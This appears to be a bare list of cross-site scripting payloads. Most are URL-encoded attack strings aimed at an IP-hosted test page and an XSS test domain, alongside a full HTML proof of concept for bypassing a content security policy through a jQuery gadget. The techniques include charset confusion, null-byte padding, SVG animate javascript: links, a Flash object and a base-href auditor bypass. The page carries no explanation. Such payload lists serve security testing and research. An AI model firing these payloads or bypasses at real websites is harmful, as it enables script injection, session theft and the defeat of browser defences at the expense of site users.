Test version:
Test environment:
===============================
http://115.159.0.191:8080/xss1.php?x=1%22%3E%3Cbr%3E%00%00%00%00%00%00%00%3Cscript%3Ealert%281%29%3C%2fscript%3E
http://115.159.0.191:8080/xss1.php?x=1%22%3E%3Cmeta%20charset=ISO-2022-JP%3E%3Csvg%20onload%1B%28B=alert(1)%3E
https://vulnerabledoma.in/char_test?body=%3Cobject%20allowscriptaccess=always%3E%20%3Cparam%20name=url%20value=https://l0.cm/xss.swf%3E
CSP bypass via jQuery Gadget
<!DOCTYPE html>
<html>
<head>
<meta http-equiv="content-security-policy" content="script-src 'nonce-random' 'strict-dynamic';">
<script nonce=random src="https://ajax.googleapis.com/ajax/libs/jquery/3.1.1/jquery.js"></script>
<script nonce=random>
$(document).ready(function(){
  // code taken from http://api.jquery.com/after/
  $( ".container" ).after( $( ".child" ) );
});
</script>
</head>
<body>
XSS XSS XSS
<form class="child"><input name="ownerDocument"/><script>alert(1);</script></form>
XSS XSS XSS
<p class="container"></p>
</body>
</html>
http://115.159.0.191:8080/xss1.php?x=1%22%3E%3Csvg%20width%3D10000px%20height%3D10000px%3E%3Ca%3E%3Crect%20width%3D10000px%20height%3D10000px%20z-index%3D9999999%20%2F%3E%3Canimate%20attributeName%3Dhref%20values%3Djavas%26%2399ript%3Aalert%281%29%3E
https://vulnerabledoma.in/xss_auditortest?test=5&q=%3Ca%20href=/**/alert%281%29%3ECLICK%3C/a%3E%3Cbase%20href=%22javascript:%5C